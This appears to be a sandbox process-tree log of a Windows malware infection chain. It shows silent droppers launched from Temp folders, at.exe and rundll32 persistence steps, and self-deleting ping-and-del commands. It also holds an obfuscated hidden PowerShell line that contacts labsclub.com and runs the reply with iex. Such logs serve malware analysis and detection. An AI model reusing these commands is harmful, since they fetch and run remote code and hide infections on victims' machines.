C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 9328⤵
- Program crash
PID:7752
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 9648⤵
- Program crash
PID:5728
-
-
-
C:\Users\Admin\AppData\Local\Temp\psu32jmbxzz\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\psu32jmbxzz\cpyrix.exe" /VERYSILENT7⤵PID:6844
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:5504
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"9⤵PID:7980
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:5428
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"9⤵PID:7740
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub9⤵PID:7236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe10⤵PID:2180
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wuewidmaitg\vict.exe"C:\Users\Admin\AppData\Local\Temp\wuewidmaitg\vict.exe" /VERYSILENT /id=5357⤵PID:6916
-
C:\Users\Admin\AppData\Local\Temp\is-FLE2I.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-FLE2I.tmp\vict.tmp" /SL5="$204F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\wuewidmaitg\vict.exe" /VERYSILENT /id=5358⤵PID:4536
-
C:\Users\Admin\AppData\Local\Temp\is-LHNEO.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-LHNEO.tmp\win1host.exe" 5359⤵PID:4688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2gwjmhwbd1k\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\2gwjmhwbd1k\Setup3310.exe" /Verysilent /subid=5777⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\is-LS8Q9.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-LS8Q9.tmp\Setup3310.tmp" /SL5="$204C6,138429,56832,C:\Users\Admin\AppData\Local\Temp\2gwjmhwbd1k\Setup3310.exe" /Verysilent /subid=5778⤵PID:5952
-
C:\Users\Admin\AppData\Local\Temp\is-2BC5N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2BC5N.tmp\Setup.exe" /Verysilent9⤵PID:1960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ekrjhugbaju\app.exe"C:\Users\Admin\AppData\Local\Temp\ekrjhugbaju\app.exe" /8-237⤵PID:7164
-
-
C:\Users\Admin\AppData\Local\Temp\1ag1snn24xd\vpn.exe"C:\Users\Admin\AppData\Local\Temp\1ag1snn24xd\vpn.exe" /silent /subid=4827⤵PID:6488
-
C:\Users\Admin\AppData\Local\Temp\is-3H3Q9.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-3H3Q9.tmp\vpn.tmp" /SL5="$204D8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\1ag1snn24xd\vpn.exe" /silent /subid=4828⤵PID:4732
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BC59HEAL8V\setups.exe"C:\Users\Admin\AppData\Local\Temp\BC59HEAL8V\setups.exe" ll4⤵PID:6964
-
C:\Users\Admin\AppData\Local\Temp\is-8M0O1.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-8M0O1.tmp\setups.tmp" /SL5="$50276,635399,250368,C:\Users\Admin\AppData\Local\Temp\BC59HEAL8V\setups.exe" ll5⤵PID:2760
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:4728
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:5764
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:6252
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:6476
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-UR94T.tmp\2rayk3ea1ew.tmp"C:\Users\Admin\AppData\Local\Temp\is-UR94T.tmp\2rayk3ea1ew.tmp" /SL5="$701D8,2592217,780800,C:\Users\Admin\AppData\Local\Temp\mylgllzi2hp\2rayk3ea1ew.exe" /VERYSILENT1⤵PID:5512
-
C:\Users\Admin\AppData\Local\Temp\is-S9HJ4.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-S9HJ4.tmp\winlthsth.exe"2⤵PID:2696
-
C:\Users\Admin\AppData\Local\Temp\MDa4YnLEs.exe"C:\Users\Admin\AppData\Local\Temp\MDa4YnLEs.exe"3⤵PID:4360
-
C:\Users\Admin\AppData\Local\Temp\MDa4YnLEs.exe"C:\Users\Admin\AppData\Local\Temp\MDa4YnLEs.exe"4⤵PID:3120
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:6804
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:5720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-HRS51.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-HRS51.tmp\IBInstaller_97039.tmp" /SL5="$40136,12322324,721408,C:\Users\Admin\AppData\Local\Temp\hvpw5bjczmt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\is-U5U1Q.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-U5U1Q.tmp\{app}\chrome_proxy.exe"2⤵PID:6016
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-U5U1Q.tmp\{app}\chrome_proxy.exe"3⤵PID:5440
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 44⤵
- Runs ping.exe
PID:892
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970392⤵PID:5984
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6104
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4qd4uxuliai\dumy3su0uwm.exe"1⤵PID:5872
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30002⤵
- Runs ping.exe
PID:4920
-
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6896
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6524
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1356
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4712
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3EA1B7ECFDACB705F7ECECB26D359682 C2⤵PID:6448
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F38B1C90C308253E4C2C7338C61ECD7D2⤵PID:1340
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:1732
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7152
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5508
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4224
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6712
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6568
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6576
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:8536
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1f5c4269-04f8-0647-b475-365339f03c23}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:8860
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:7708
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6280
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5196
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8840
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7300
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\cff76edc9a2648f5b294a3c24b2d3ac4 /t 7456 /p 88401⤵PID:8372
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5648